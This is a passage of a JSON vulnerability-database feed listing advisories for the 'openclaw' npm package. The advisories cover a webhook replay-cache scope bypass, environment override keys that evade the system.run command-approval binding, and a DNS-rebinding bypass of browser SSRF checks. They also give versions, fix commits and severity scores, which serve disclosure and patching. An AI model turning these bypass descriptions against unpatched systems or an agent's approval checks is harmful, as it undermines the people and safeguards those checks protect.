            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7akj-469t-57hz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90184?format=api",
            "vulnerability_id": "VCID-7dyw-9b37-yqh4",
            "summary": "OpenClaw: Zalo webhook replay cache cross-target messageId scope bypass\n## Summary\nZalo webhook replay cache cross-target messageId scope bypass\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: v2026.3.28 replay dedupe is still keyed too broadly, but the issue should stay scoped to authenticated sibling-target delivery paths rather than arbitrary unauthenticated attackers.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d038bb242c11f39e45f6a4bde400e5fd42e4ebf` — 2026-03-31T19:33:57+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41402",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11323",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11356",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11364",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41402"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hhq4-97c2-p447",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hhq4-97c2-p447"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41402",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41402"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-cache-cross-target-messageid-scope-bypass",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-cache-cross-target-messageid-scope-bypass"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hhq4-97c2-p447",
                    "reference_id": "GHSA-hhq4-97c2-p447",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-hhq4-97c2-p447"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41402",
                "GHSA-hhq4-97c2-p447"
            ],
            "risk_score": 1.9,
            "exploitability": "0.5",
            "weighted_severity": "3.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7dyw-9b37-yqh4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89799?format=api",
            "vulnerability_id": "VCID-7ntr-5dr5-9uf8",
            "summary": "OpenClaw: Windows-compatible env override keys could bypass system.run approval binding\n## Summary\n\nBefore OpenClaw 2026.4.2, system-run approval binding normalized environment override keys differently from host execution. Windows-compatible keys could be omitted from the approval binding while still being injected at execution time.\n\n## Impact\n\nAn approved command could run with attacker-chosen environment overrides that were not represented in the approval binding. This created an approval-integrity gap for affected host-exec flows.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d` — align approval binding with execution-time env-key normalization\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @iskindar for reporting, and thanks @wsparks-vc for coordination.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-98ch-45wp-ch47",
                    "reference_id": "GHSA-98ch-45wp-ch47",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-98ch-45wp-ch47"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "GHSA-98ch-45wp-ch47"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7ntr-5dr5-9uf8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89179?format=api",
            "vulnerability_id": "VCID-7snr-fn3u-x3b8",
            "summary": "OpenClaw: Browser SSRF hostname validation could be bypassed by DNS rebinding\n## Summary\n\nBrowser SSRF hostname validation could be bypassed by DNS rebinding.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nBrowser navigation policy could validate a hostname/IP resolution that differed from the address Chromium ultimately used, allowing DNS rebinding style SSRF pivots.\n\n## Technical Details\n\nThe fix tightens strict browser hostname navigation so unallowlisted hostname URLs fail closed under restrictive policy.\n\n## Fix\n\nThe issue was fixed in #64367. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `121c452d666d4749744dc2089287d0227aae2ed3`\n- PR: #64367\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43582",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09978",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09994",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00038",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11564",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43582"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/121c452d666d4749744dc2089287d0227aae2ed3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/121c452d666d4749744dc2089287d0227aae2ed3"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/64367",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/64367"
                },
                {
